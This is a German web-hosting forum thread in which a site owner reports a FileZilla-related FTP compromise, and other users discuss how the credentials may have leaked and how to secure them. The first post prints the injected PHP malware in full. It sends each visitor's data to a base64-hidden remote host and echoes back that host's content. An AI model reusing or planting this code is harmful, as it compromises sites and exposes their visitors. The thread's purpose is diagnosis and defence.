Seite 1 von 2 1 2 LetzteLetzte
Ergebnis 1 bis 15 von 22

Thema: FTP Zugang missbraucht / Filezilla

  1. #1
    Reseller
    Registriert seit
    19.07.2001
    Beiträge
    52

    FTP Zugang missbraucht / Filezilla

    Hallo,

    ich habe zufällig festgestellt, dass auf mehreren meiner Webseiten über einen FTP upload der unten genannte Schadcode in mehrere PHP Skripte eingefügt wurde (meist index.php).

    Da die Zugangsdaten im Filezilla (für OSX) abgelegt waren, vermute ich, dass die Kennwörter über meinen Mac abgegriffen wurden. Allerdings findet mein Virenscanner (Kaspersky für Mac) keinerlei Infektion. Sehr Ihr evtl. noch eine andere Möglichkeit, wie die Zugangsdaten abgegriffen werden konnten?
    PHP-Code:
    <?php
    if (!isset($sRetry))
    {
    global 
    $sRetry;
    $sRetry 1;
        
    // This code use for global bot statistic
        
    $sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
        
    $stCurlHandle NULL;
        
    $stCurlLink "";
        if((
    strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
        
    {
            if(isset(
    $_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
            
    $stCurlLink base64_decode'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
                @
    $stCurlHandle curl_init$stCurlLink ); 
        }
        } 
    if ( 
    $stCurlHandle !== NULL )
    {
        
    curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
        
    curl_setopt($stCurlHandleCURLOPT_TIMEOUT12);
        
    $sResult = @curl_exec($stCurlHandle); 
        if (
    $sResult[0]=="O"
         {
    $sResult[0]=" ";
          echo 
    $sResult// Statistic code end
          
    }
        
    curl_close($stCurlHandle); 
    }
    }
    ?>

  2. #2
    Gast
    Registriert seit
    15.10.2006
    Beiträge
    1.111

    AW: FTP Zugang missbraucht / Filezilla

    Hi,

    bei PHP in Verbindung mit Hacks... fällt mir als Erstes Wordpress ein!

    Wird eventuell eine veraltete Wordpress Version (und/oder Wordpress Plugins) noch verwendet?

    Hier wurde ja schon oft diskutiert, wie unsicher FileZilla die Passwörter ablegt, aber ich denke dass die jemand lokal von deinem Rechner ausgelesen hat -> ist eher unwahrscheinlicher, als dass unsichere PHP-Skripte verwendet wurden.

    Stefan
    Geändert von Stefan S. (05.04.2012 um 23:26 Uhr) Grund: Plugins added

  3. #3
    Reseller
    Registriert seit
    19.07.2001
    Beiträge
    52

    AW: FTP Zugang missbraucht / Filezilla

    Hi Stefan,

    vielen Dank für Deine Antwort! Ich hatte auch zunächst gedacht, dass so etwas wahrscheinlicher sei. Allerdings sind die Änderungen über vier verschiedene FTP Zugänge durchgeführt worden (zumindest tauchen die Änderungen in den FTP logs auf). Zugegeben läuft unter einem Zugang eine veraltete wordpress Version, aber die FTP Zugänge sind durch quotas getrennt und ich kann mir nicht erklären, wie über wordpress die Zugangsdaten ausgelesen werden können?

    Viele Grüße,
    Max

  4. #4
    Gast
    Registriert seit
    15.10.2006
    Beiträge
    1.111

    AW: FTP Zugang missbraucht / Filezilla

    Hi Max,

    sind die Zugangsdaten vom FTP zufällig in der wp-config.php gespeichert worden? Bzw. steht was in der *options- Tabelle im Feld ftp_credentials in der Datenbank?

    Wenn ein Angreifer Zugriff auf die wp-config hatte und/oder auf die Datenbank, dann konnte er die FTP-Daten leicht auslesen.

    Stefan
    Geändert von Stefan S. (05.04.2012 um 23:57 Uhr)

  5. #5
    Gast
    Registriert seit
    03.11.2011
    Beiträge
    5

    AW: FTP Zugang missbraucht / Filezilla

    Zitat Zitat von max81 Beitrag anzeigen
    Sehr Ihr evtl. noch eine andere Möglichkeit, wie die Zugangsdaten abgegriffen werden konnten?
    - Notebook und mal nen offenes W-Lan genutzt
    - FTP-Passwort per Dictionary Angriff erraten
    - FTP-Zugang weitergegeben, Infektion bei Dienstleister / Bekannten

  6. #6
    Communityservice Avatar von Nils Dornblut
    Registriert seit
    15.10.2000
    Beiträge
    35.967

    AW: FTP Zugang missbraucht / Filezilla

    Hallo max81,

    sie können sich gerne an die Technik wenden und wir schauen uns das einmal an. Ändern Sie bitte in jedem Fall alle Passwörter (Kundenmenü, FTP, MySQL, ggf. SSH und zur Sicherheit auch E-Mail-Accounts).

    Mit freundlichen Grüßen

    Nils Dornblut
    Communityservice

    __________________
    Blog - Facebook - Twitter
    Communitybetreiber: domainfactory GmbH
    Impressum / Pflichtangaben

  7. #7
    Kunde
    Registriert seit
    28.10.2010
    Beiträge
    59

    AW: FTP Zugang missbraucht / Filezilla

    Ich hatte vor einige Jahre das gleiche Problem. Ohne Wordpress aber mit Filezilla.
    Die Kinder hatten ein Spiel installiert welches offenbar die filezille konfiguration ausgelesen hatte. Das war auf einem Rechner den ich zuvor benutzt hatte und an den Kindern weiter gegeben hatte. Nur die Websites die auf diesem Rechner mit Filezille zugänglich waren, waren auch betroffen.
    Empfehlung:
    - Anderer Rechner nehmen
    - neue ftp Passworter einrichten
    - anderer FTP Client nehmen (muss icht unbedingt aber filezille ist anfällig)
    - Shadcode entfernen
    - Mit Google webmaster tools websites erneut von google prüfen lassen
    - alter Rechner sauber kriegen (notfalls neu installieren)
    Ernest

  8. #8
    Gast
    Registriert seit
    16.11.2009
    Beiträge
    215

    AW: FTP Zugang missbraucht / Filezilla

    Man kann auch einfach die Passwörter nicht in Filezilla oder auf dem Computer ablegen (sondern im Kopf oder woanders irgendwo in der Nähe - nicht offen wenn das Büro auch von anderen genutzt wird).
    minikurier-sts MKSTS®

  9. #9
    Kunde
    Registriert seit
    28.10.2010
    Beiträge
    59

    AW: FTP Zugang missbraucht / Filezilla

    Zitat Zitat von Bambär Beitrag anzeigen
    Man kann auch einfach die Passwörter nicht in Filezilla oder auf dem Computer ablegen (sondern im Kopf oder woanders irgendwo in der Nähe - nicht offen wenn das Büro auch von anderen genutzt wird).
    Im Kopf? Nööö, das geht wirklich nicht. ;-)
    Ich verwende jetzt das kostenlose netbeans als Editor und Projekt-Management. Hier ist der ftp-client mit integriert und dieser geht auch per sftp damit die Passwörter nicht in Klartext über das Internet gehen.

  10. #10
    Gast
    Registriert seit
    16.11.2009
    Beiträge
    215

    AW: FTP Zugang missbraucht / Filezilla

    Auch Filezilla unterstützt SFTP. Ich sehe es halt als Schwachpunkt an wenn Passwörter (egal ob im Klartext oder verschlüsselt) auf dem Computer mit abgelegt werden. Aber es muß jeder selbst wissen wieviel Sicherheit ihn Bequemlichkeit wert ist.
    minikurier-sts MKSTS®

  11. #11
    Kunde
    Registriert seit
    14.05.2005
    Beiträge
    255

    AW: FTP Zugang missbraucht / Filezilla

    Danke für den Hinweis - für Leute, die Filezilla mögen, jedoch sicherheitsbewusst denken, sei folgender Artikel empfohlen (FileZilla mit KeePass): http://ganz-sicher.net/blog/tutorial...en-passworter/

  12. #12
    Reseller
    Registriert seit
    03.07.2007
    Beiträge
    838

    AW: FTP Zugang missbraucht / Filezilla

    Für diejenigen, die viel per FTP oder SFTP arbeiten, kann ich nur Winscp ( http://winscp.net/eng/docs/lang:de ) empfehlen. Da kann man die Verschlüsselung der Passwörter per Default festlegen.

    Gruß,
    Michael

  13. #13
    Kunde
    Registriert seit
    05.09.2012
    Beiträge
    2

    AW: FTP Zugang missbraucht / Filezilla

    Hallo,

    ich kann mich nur anschließen: Finger weg von Filezilla! Mein FTP-Zugang wurde auch missbraucht. Auf Filezilla wäre ich wohl nie gekommen. Aber meine Website wurde immer und immer wieder gehackt, obwohl ich ständig mein Passwort geändert und den Webspace bereinigt hatte. Auf Filezilla bin ich nur durch Zufall gekommen, als ich aus ganz anderen Gründen eine Konfigurationsdatei geöffnet hatte... da staunte ich nicht schlecht, als da alle meine Zugangsdaten im Klartext drin standen . Denn die speichert Filezilla bei jedem Verbindungsaufbau. Siehe hier: http://mrcrowley.de/testbericht/so-u...ist-filezilla/ (Video von mir).

    Also Finger weg von Filezilla! WinSCP kann ich auch empfehlen.

    VG, Crowley

  14. #14
    Gast
    Registriert seit
    16.11.2009
    Beiträge
    215

    AW: FTP Zugang missbraucht / Filezilla

    Wobei Filezilla da wohl weniger für kann. Der Schwachpunkt liegt da wohl eher beim infizierten Rechner worauf Filezilla ist...und daran daß die Passwörter lokal gespeichert werden...
    minikurier-sts MKSTS®

  15. #15
    Forenexperte² (Reseller) Avatar von Enigma
    Registriert seit
    20.07.2001
    Beiträge
    14.478

    AW: FTP Zugang missbraucht / Filezilla

    Zitat Zitat von Bambär Beitrag anzeigen
    Wobei Filezilla da wohl weniger für kann. Der Schwachpunkt liegt da wohl eher beim infizierten Rechner worauf Filezilla ist...und daran daß die Passwörter lokal gespeichert werden...
    Na ja, Passwörter im Klartext zu speichern ist schon ein ziemlicher Hammer... Klar ist der Rechner selbst kompromittiert, was anderweitig verhindert werden sollte, aber da man damit heutzutage rechnen muss, sind weitere "Schutzschichten" ein absolutes Muss. Da haben die Entwickler schlicht gepennt.

    Gruß,
    Jan
    Two hours of trial and error can save ten minutes of manual reading.

Seite 1 von 2 1 2 LetzteLetzte

Ähnliche Themen

  1. Neu angelegter ftp-Zugang - kein Zugang via Filezilla
    Von clemens_60 im Forum Scriptsprachen / SQL / Anwendungen
    Antworten: 24
    Letzter Beitrag: 12.06.2012, 08:15
  2. FTP-Zugang
    Von MikeJB im Forum Archiv: Einsteiger-Forum
    Antworten: 4
    Letzter Beitrag: 07.12.2003, 23:21
  3. FTP Zugang
    Von fremd im Forum Fragen und Entscheidungshilfen zu den Resellerfunktionen
    Antworten: 7
    Letzter Beitrag: 20.11.2001, 18:21
  4. ftp-Zugang kein Zugang beim 6. mal
    Von osnord im Forum Tarifberatung und Allgemeines
    Antworten: 5
    Letzter Beitrag: 22.10.2001, 10:31
  5. FTP-Zugang
    Von Udo512 im Forum ManagedHosting und ManagedHosting Pro
    Antworten: 1
    Letzter Beitrag: 20.03.2001, 10:25

Stichworte

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •